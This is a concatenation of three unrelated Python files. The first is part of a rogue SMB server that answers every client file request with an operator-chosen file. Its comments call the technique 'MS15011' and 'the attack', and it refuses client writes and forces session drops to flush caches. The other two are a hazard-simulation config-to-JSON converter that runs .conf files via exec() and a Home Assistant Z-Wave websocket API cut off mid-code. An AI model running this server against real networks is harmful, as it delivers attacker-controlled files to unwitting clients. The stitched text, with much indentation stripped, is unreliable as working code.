origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
infoRecord = None  # guard against NameError if the query below raises
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
try:
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
except UnicodeDecodeError:
import sys
ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
        # Windows clients speaking SMB2 will also perform a QueryDirectory,
        # expecting to get back the filename they asked for. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
        respSMBCommand['Buffer'] = '\x00'
        errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
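            # Directory information entries must be padded to an 8-byte boundary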
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
        ## Process the request here: does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
        # We won't search for the share... all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \
recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
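        # Flag 0x8 == TREE_CONNECT_ANDX_EXTENDED_RESPONSE: the client requested
        # the extended response format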
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
        # We won't search for the share... all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setDefaultFile(self, filename):
self.defaultFile = filename
    def setExtensionsConfig(self, configFile):
        # configFile is an open file object with one EXTENSION=pathname mapping per line
        for line in configFile.readlines():
            line = line.strip('\r\n ')
            if line and not line.startswith('#'):
                extension, pathName = line.split('=')
                self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
    parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module "
                                     "will return the contents of pathname")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB "
"clients")
parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map '
'extensions to files to deliver. For those extensions not present, pathname will be delivered')
parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
try:
options = parser.parse_args()
    except Exception as e:
logging.critical(str(e))
sys.exit(1)
s = KarmaSMBServer(options.smb2support)
s.setDefaultFile(os.path.normpath(options.fileName))
if options.config is not None:
s.setExtensionsConfig(options.config)
s.start()
logging.info("Servers started, waiting for connections")
    while True:
        try:
            sys.stdin.read()
        except KeyboardInterrupt:
            sys.exit(1)
|
|
import json
import collections
import os
import argparse
import configparser
import ast
def _read_file(setup_file):
    """
    Read a scenario setup file (.conf or .ini) and return the parsed
    setup object together with the file extension.
    """
    if not os.path.isfile(setup_file):
        print("[ERROR] could not read file: {}".format(setup_file))
        raise SystemExit()
    _, file_ext = os.path.splitext(os.path.basename(setup_file))
    if file_ext == '.conf':
        discard = {}
        setup = {}
        with open(setup_file) as setup_fh:
            exec(setup_fh.read(), discard, setup)
    elif file_ext == '.ini':
        setup = configparser.ConfigParser()
        setup.optionxform = str
        setup.read(setup_file)
    else:
        print("[ERROR] unsupported setup file type: {}".format(file_ext))
        raise SystemExit()
    return setup, file_ext
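# Example (illustrative path): setup, ext = _read_file("simulation_setup/scenario_x.ini")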
def convert_ini_object_to_json(setup):
data = collections.OrderedDict()
for section in setup.sections():
data[section] = collections.OrderedDict()
for param in setup[section].keys():
            try:
                data[section][param] = \
                    ast.literal_eval(setup.get(section, param))
            except (ValueError, SyntaxError):
                # ast.literal_eval raises ValueError/SyntaxError (not KeyError)
                # on non-literal strings, since param comes from the section's
                # own keys; keep the raw string value in that case.
                data[section][param] = setup.get(section, param)
json_data = json.dumps(data, indent=4, sort_keys=True)
return json_data
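# Example (illustrative): an ini file containing
#   [Scenario]
#   SCENARIO_NAME = 'Test'
# yields '{"Scenario": {"SCENARIO_NAME": "Test"}}' (pretty-printed, keys sorted).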
def convert_conf_object_to_json(setup):
data = collections.OrderedDict()
data['Scenario'] = collections.OrderedDict()
try:
data['Scenario']['SCENARIO_NAME'] = setup['SCENARIO_NAME']
except KeyError:
data['Scenario']['SCENARIO_NAME'] = None
try:
data['Scenario']['INTENSITY_MEASURE_PARAM']\
= setup['INTENSITY_MEASURE_PARAM']
except KeyError:
data['Scenario']['INTENSITY_MEASURE_PARAM'] = None
try:
data['Scenario']['INTENSITY_MEASURE_UNIT']\
= setup['INTENSITY_MEASURE_UNIT']
except KeyError:
data['Scenario']['INTENSITY_MEASURE_UNIT'] = None
try:
data['Scenario']['FOCAL_HAZARD_SCENARIOS']\
= setup['FOCAL_HAZARD_SCENARIOS']
except KeyError:
data['Scenario']['FOCAL_HAZARD_SCENARIOS'] = None
data['Hazard'] = collections.OrderedDict()
try:
data['Hazard']['HAZARD_INPUT_METHOD']\
= setup['HAZARD_INPUT_METHOD']
except KeyError:
data['Hazard']['HAZARD_INPUT_METHOD'] = None
try:
data['Hazard']['INTENSITY_MEASURE_MIN']\
= setup['INTENSITY_MEASURE_MIN']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_MIN'] = None
try:
data['Hazard']['INTENSITY_MEASURE_MAX']\
= setup['INTENSITY_MEASURE_MAX']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_MAX'] = None
try:
data['Hazard']['INTENSITY_MEASURE_STEP']\
= setup['INTENSITY_MEASURE_STEP']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_STEP'] = None
try:
data['Hazard']['NUM_SAMPLES']\
= setup['NUM_SAMPLES']
except KeyError:
data['Hazard']['NUM_SAMPLES'] = None
    # TODO: read these values from the config file at a later stage; they are
    # hardcoded for now, so no try/except is needed.
    data['Hazard']['HAZARD_TYPE'] = "earthquake"
    data['Hazard']['HAZARD_RASTER'] = None
data['Restoration'] = collections.OrderedDict()
try:
data['Restoration']['TIME_UNIT'] = setup['TIME_UNIT']
except KeyError:
data['Restoration']['TIME_UNIT'] = None
try:
data['Restoration']['RESTORE_PCT_CHECKPOINTS']\
= setup['RESTORE_PCT_CHKPOINTS']
except KeyError:
data['Restoration']['RESTORE_PCT_CHECKPOINTS'] = None
try:
data['Restoration']['RESTORE_TIME_STEP']\
= setup['RESTORE_TIME_STEP']
except KeyError:
data['Restoration']['RESTORE_TIME_STEP'] = None
try:
data['Restoration']['RESTORE_TIME_MAX']\
= setup['RESTORE_TIME_MAX']
except KeyError:
data['Restoration']['RESTORE_TIME_MAX'] = None
try:
data['Restoration']['RESTORATION_STREAMS']\
= setup['RESTORATION_STREAMS']
except KeyError:
data['Restoration']['RESTORATION_STREAMS'] = None
data['System'] = collections.OrderedDict()
try:
data['System']['INFRASTRUCTURE_LEVEL']\
= setup['INFRASTRUCTURE_LEVEL']
except KeyError:
data['System']['INFRASTRUCTURE_LEVEL'] = None
try:
data['System']['SYSTEM_CLASSES']\
= setup['SYSTEM_CLASSES']
except KeyError:
data['System']['SYSTEM_CLASSES'] = None
try:
data['System']['SYSTEM_CLASS'] = setup['SYSTEM_CLASS']
except KeyError:
data['System']['SYSTEM_CLASS'] = None
try:
data['System']['SYSTEM_SUBCLASS'] = setup['SYSTEM_SUBCLASS']
except KeyError:
data['System']['SYSTEM_SUBCLASS'] = None
try:
data['System']['COMMODITY_FLOW_TYPES'] = setup['COMMODITY_FLOW_TYPES']
except KeyError:
data['System']['COMMODITY_FLOW_TYPES'] = None
try:
data['System']['SYS_CONF_FILE_NAME'] = setup['SYS_CONF_FILE_NAME']
except KeyError:
data['System']['SYS_CONF_FILE_NAME'] = None
data['SWITCHES'] = collections.OrderedDict()
try:
data['SWITCHES']['FIT_PE_DATA'] = setup['FIT_PE_DATA']
except KeyError:
data['SWITCHES']['FIT_PE_DATA'] = None
try:
data['SWITCHES']['SWITCH_FIT_RESTORATION_DATA'] = setup['SWITCH_FIT_RESTORATION_DATA']
except KeyError:
data['SWITCHES']['SWITCH_FIT_RESTORATION_DATA'] = None
try:
data['SWITCHES']['SWITCH_SAVE_VARS_NPY'] = setup['SWITCH_SAVE_VARS_NPY']
except KeyError:
data['SWITCHES']['SWITCH_SAVE_VARS_NPY'] = None
try:
data['SWITCHES']['MULTIPROCESS'] = setup['MULTIPROCESS']
except KeyError:
data['SWITCHES']['MULTIPROCESS'] = None
try:
data['SWITCHES']['RUN_CONTEXT'] = setup['RUN_CONTEXT']
except KeyError:
data['SWITCHES']['RUN_CONTEXT'] = None
json_data = json.dumps(data, indent=4, sort_keys=True)
return json_data
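# Note: the repeated try/except blocks in convert_conf_object_to_json could be
# collapsed with a small helper. A minimal sketch (illustrative only; this
# helper is not used by the converter above):
def _get_or_none(setup, key):
    """Return setup[key], or None when the key is absent."""
    try:
        return setup[key]
    except KeyError:
        return None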
def convert_to_json(conf_file_path):
parent_folder_name = os.path.dirname(conf_file_path)
file_name = os.path.splitext(os.path.basename(conf_file_path))[0]
json_filename = os.path.join(parent_folder_name, file_name + '.json')
setup, file_type = _read_file(conf_file_path)
if file_type == '.conf':
json_data = convert_conf_object_to_json(setup)
elif file_type == '.ini':
json_data = convert_ini_object_to_json(setup)
    else:
        print("\n[ERROR] Incompatible file type for setup file.\n")
        raise SystemExit()
    with open(json_filename, 'w') as obj:
        obj.write(json_data)
    return os.path.abspath(json_filename)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", type=str,
help="Convert specified setup file from `conf` to json")
    parser.add_argument(
        "-a", "--all", action="store_true",
        help="Convert all setup files under the default simulation_setup directory to json.")
args = parser.parse_args()
if args.file:
conf_file_path = args.file
convert_to_json(conf_file_path)
# ***********************************************
# The default location of simulation setup files:
par_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sim_setup_dir = os.path.join(par_dir, "simulation_setup")
# ***********************************************
if args.all:
conf_file_paths = []
for root, dir_names, file_names in os.walk(sim_setup_dir):
for file_name in file_names:
if file_name.endswith('.conf'):
if 'simulation_setup' in root:
conf_file_path = os.path.join(root, file_name)
conf_file_paths.append(conf_file_path)
for conf_file_path in conf_file_paths:
convert_to_json(conf_file_path)
if __name__ == "__main__":
main()
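# Usage (illustrative; substitute this module's actual filename):
#   python convert_setup_to_json.py -f simulation_setup/scenario_x.conf
#   python convert_setup_to_json.py --all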
|
|
"""Web socket API for OpenZWave."""
from openzwavemqtt.const import (
ATTR_CODE_SLOT,
ATTR_LABEL,
ATTR_POSITION,
ATTR_VALUE,
EVENT_NODE_ADDED,
EVENT_NODE_CHANGED,
)
from openzwavemqtt.exceptions import NotFoundError, NotSupportedError
from openzwavemqtt.util.lock import clear_usercode, get_code_slots, set_usercode
from openzwavemqtt.util.node import (
get_config_parameters,
get_node_from_manager,
set_config_parameter,
)
import voluptuous as vol
import voluptuous_serialize
from homeassistant.components import websocket_api
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv
from .const import ATTR_CONFIG_PARAMETER, ATTR_CONFIG_VALUE, DOMAIN, MANAGER
from .lock import ATTR_USERCODE
DRY_RUN = "dry_run"
TYPE = "type"
ID = "id"
OZW_INSTANCE = "ozw_instance"
NODE_ID = "node_id"
PARAMETER = ATTR_CONFIG_PARAMETER
VALUE = ATTR_CONFIG_VALUE
SCHEMA = "schema"
ATTR_NODE_QUERY_STAGE = "node_query_stage"
ATTR_IS_ZWAVE_PLUS = "is_zwave_plus"
ATTR_IS_AWAKE = "is_awake"
ATTR_IS_FAILED = "is_failed"
ATTR_NODE_BAUD_RATE = "node_baud_rate"
ATTR_IS_BEAMING = "is_beaming"
ATTR_IS_FLIRS = "is_flirs"
ATTR_IS_ROUTING = "is_routing"
ATTR_IS_SECURITYV1 = "is_securityv1"
ATTR_NODE_BASIC_STRING = "node_basic_string"
ATTR_NODE_GENERIC_STRING = "node_generic_string"
ATTR_NODE_SPECIFIC_STRING = "node_specific_string"
ATTR_NODE_MANUFACTURER_NAME = "node_manufacturer_name"
ATTR_NODE_PRODUCT_NAME = "node_product_name"
ATTR_NEIGHBORS = "neighbors"
@callback
def async_register_api(hass):
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_get_instances)
websocket_api.async_register_command(hass, websocket_get_nodes)
websocket_api.async_register_command(hass, websocket_network_status)
websocket_api.async_register_command(hass, websocket_network_statistics)
websocket_api.async_register_command(hass, websocket_node_metadata)
websocket_api.async_register_command(hass, websocket_node_status)
websocket_api.async_register_command(hass, websocket_node_statistics)
websocket_api.async_register_command(hass, websocket_refresh_node_info)
websocket_api.async_register_command(hass, websocket_get_config_parameters)
websocket_api.async_register_command(hass, websocket_set_config_parameter)
websocket_api.async_register_command(hass, websocket_set_usercode)
websocket_api.async_register_command(hass, websocket_clear_usercode)
websocket_api.async_register_command(hass, websocket_get_code_slots)
def _call_util_function(hass, connection, msg, send_result, function, *args):
"""Call an openzwavemqtt.util function."""
    try:
        node = get_node_from_manager(
            hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
        )
        payload = function(node, *args)
    except NotFoundError as err:
        connection.send_error(
            msg[ID],
            websocket_api.const.ERR_NOT_FOUND,
            err.args[0],
        )
        return
    except NotSupportedError as err:
        connection.send_error(
            msg[ID],
            websocket_api.const.ERR_NOT_SUPPORTED,
            err.args[0],
        )
        return
if send_result:
connection.send_result(
msg[ID],
payload,
)
return
connection.send_result(msg[ID])
def _get_config_params(node, *args):
raw_values = get_config_parameters(node)
config_params = []
for param in raw_values:
        # Initialize both so unsupported parameter types don't raise NameError below.
        schema = {}
        data = {}
if param["type"] in ("Byte", "Int", "Short"):
schema = vol.Schema(
{
vol.Required(param["label"], default=param["value"]): vol.All(
vol.Coerce(int), vol.Range(min=param["min"], max=param["max"])
)
}
)
data = {param["label"]: param["value"]}
if param["type"] == "List":
for options in param["options"]:
if options["Label"] == param["value"]:
selected = options
break
schema = vol.Schema(
{
vol.Required(param["label"],): vol.In(
{
option["Value"]: option["Label"]
for option in param["options"]
}
)
}
)
data = {param["label"]: selected["Value"]}
config_params.append(
{
"type": param["type"],
"label": param["label"],
"parameter": param["parameter"],
"help": param["help"],
"value": param["value"],
"schema": voluptuous_serialize.convert(
schema, custom_serializer=cv.custom_serializer
),
"data": data,
}
)
return config_params
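# Shape of each entry returned by _get_config_params (illustrative values):
# {
#     "type": "Byte",
#     "label": "Dimming Duration",
#     "parameter": 9,
#     "help": "...",
#     "value": 5,
#     "schema": [...],  # voluptuous schema serialized by voluptuous_serialize
#     "data": {"Dimming Duration": 5},
# }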
@websocket_api.websocket_command({vol.Required(TYPE): "ozw/get_instances"})
def websocket_get_instances(hass, connection, msg):
"""Get a list of OZW instances."""
manager = hass.data[DOMAIN][MANAGER]
instances = []
for instance in manager.collections["instance"]:
instances.append(dict(instance.get_status().data, ozw_instance=instance.id))
connection.send_result(
msg[ID],
instances,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_nodes",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_nodes(hass, connection, msg):
"""Get a list of nodes for an OZW instance."""
manager = hass.data[DOMAIN][MANAGER]
nodes = []
for node in manager.get_instance(msg[OZW_INSTANCE]).collections["node"]:
nodes.append(
{
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
NODE_ID: node.node_id,
ATTR_IS_ZWAVE_PLUS: node.is_zwave_plus,
ATTR_IS_AWAKE: node.is_awake,
ATTR_IS_FAILED: node.is_failed,
ATTR_NODE_BAUD_RATE: node.node_baud_rate,
ATTR_IS_BEAMING: node.is_beaming,
ATTR_IS_FLIRS: node.is_flirs,
ATTR_IS_ROUTING: node.is_routing,
ATTR_IS_SECURITYV1: node.is_securityv1,
ATTR_NODE_BASIC_STRING: node.node_basic_string,
ATTR_NODE_GENERIC_STRING: node.node_generic_string,
ATTR_NODE_SPECIFIC_STRING: node.node_specific_string,
ATTR_NODE_MANUFACTURER_NAME: node.node_manufacturer_name,
ATTR_NODE_PRODUCT_NAME: node.node_product_name,
ATTR_NEIGHBORS: node.neighbors,
OZW_INSTANCE: msg[OZW_INSTANCE],
}
)
connection.send_result(
msg[ID],
nodes,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/set_usercode",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(ATTR_CODE_SLOT): vol.Coerce(int),
vol.Required(ATTR_USERCODE): cv.string,
}
)
def websocket_set_usercode(hass, connection, msg):
"""Set a usercode to a node code slot."""
    # Pass the usercode value from the message, not the ATTR_USERCODE constant.
    _call_util_function(
        hass,
        connection,
        msg,
        False,
        set_usercode,
        msg[ATTR_CODE_SLOT],
        msg[ATTR_USERCODE],
    )
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/clear_usercode",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(ATTR_CODE_SLOT): vol.Coerce(int),
}
)
def websocket_clear_usercode(hass, connection, msg):
"""Clear a node code slot."""
_call_util_function(
hass, connection, msg, False, clear_usercode, msg[ATTR_CODE_SLOT]
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_code_slots",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_code_slots(hass, connection, msg):
"""Get status of node's code slots."""
_call_util_function(hass, connection, msg, True, get_code_slots)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_config_parameters",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_config_parameters(hass, connection, msg):
"""Get a list of configuration parameters for an OZW node instance."""
_call_util_function(hass, connection, msg, True, _get_config_params)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/set_config_parameter",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(PARAMETER): vol.Coerce(int),
vol.Required(VALUE): vol.Any(
vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Exclusive(ATTR_LABEL, "bit"): cv.string,
vol.Exclusive(ATTR_POSITION, "bit"): vol.Coerce(int),
vol.Required(ATTR_VALUE): bool,
},
cv.has_at_least_one_key(ATTR_LABEL, ATTR_POSITION),
)
],
),
vol.Coerce(int),
bool,
cv.string,
),
}
)
def websocket_set_config_parameter(hass, connection, msg):
"""Set a config parameter to a node."""
_call_util_function(
hass, connection, msg, True, set_config_parameter, msg[PARAMETER], msg[VALUE]
)
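# Example VALUE payloads accepted by the schema above (illustrative):
#   7, True, "some string", or a list of partial-parameter bits such as
#   [{"label": "Enable LED", "value": True}] or [{"position": 1, "value": False}]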
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/network_status",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_network_status(hass, connection, msg):
"""Get Z-Wave network status."""
manager = hass.data[DOMAIN][MANAGER]
status = manager.get_instance(msg[OZW_INSTANCE]).get_status().data
connection.send_result(
msg[ID],
dict(status, ozw_instance=msg[OZW_INSTANCE]),
)
@websocket_api.websocket_command(
{
